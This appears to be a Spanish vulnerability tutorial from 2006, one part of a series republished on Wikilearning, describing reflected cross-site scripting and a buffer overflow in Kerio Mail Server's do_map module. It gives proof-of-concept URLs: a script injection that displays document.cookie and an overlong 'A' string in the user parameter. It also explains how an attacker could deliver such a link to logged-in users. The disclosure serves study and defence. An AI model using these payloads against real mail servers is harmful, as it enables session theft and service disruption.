Buscar Más buscado

Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo do_map

5 - Módulo do_map

[editar]
Tutorial creado por David F. Madrid. Extraido de: http://www.nautopia.net
21 de Febrero de 2006
< anterior | 1 ... 3 4 5
Debido a insuficiente filtrado de los caracteres contenidos por las variables de la petición HTTP cuyo contenido aparece por pantalla hace que se puede inyectar un script en el contexto de la página

http://[Server]/do_map?action=new&oldalias=eso&alias=<script>alert(document.cookie); </script>&folder=public&user=tro

También se produce el mismo desbordamiento

[[http://[Server]/do_map?action=new&oldalias=eso&alias=aaa&folder=public&user=AAAAAAAAAAAAAA http://[Server]/do_map?action=new&oldalias=eso&alias=aaa&folder=public&user=AAAAAAAAAAAAAA]] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA

Debido a la posibilidad de incluir el exploit en la URL, un intruso que no tenga acceso al webmail puede contruir un enlace con el código a ejecutar esperando que sea pulsado por alguien que tenga abierta una sesión en un Kerio mailserver.
[editar]
< anterior | 1 ... 3 4 5

Opinar
1 opinión

gcñ´d

fgkdnmflsjkgklsd

Tutoriales relacionados con 'Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server'

Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server
Kerio mailserver es un servidor de correo que soporta los protocolos imap, pop3 y smtp.... Más »

Anuncios Google

Autor y licencia de 'Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server'


Tutorial de David F. Madrid. Extraido de: http://www.nautopia.net CopyLeft
Debe reconocer los créditos de la obra de la manera especificada por el autor o el licenciador.
Este contenido ha sido recopilado por el equipo de Wikilearning. Todo el contenido recopilado se ha obtenido respetando y comunicando en nuestro site la licencia de cada fuente.
Wikilearning tiene permiso expreso por escrito de los autores para publicar los contenidos que ha extraído de otras webs, incluyendo su uso comercial.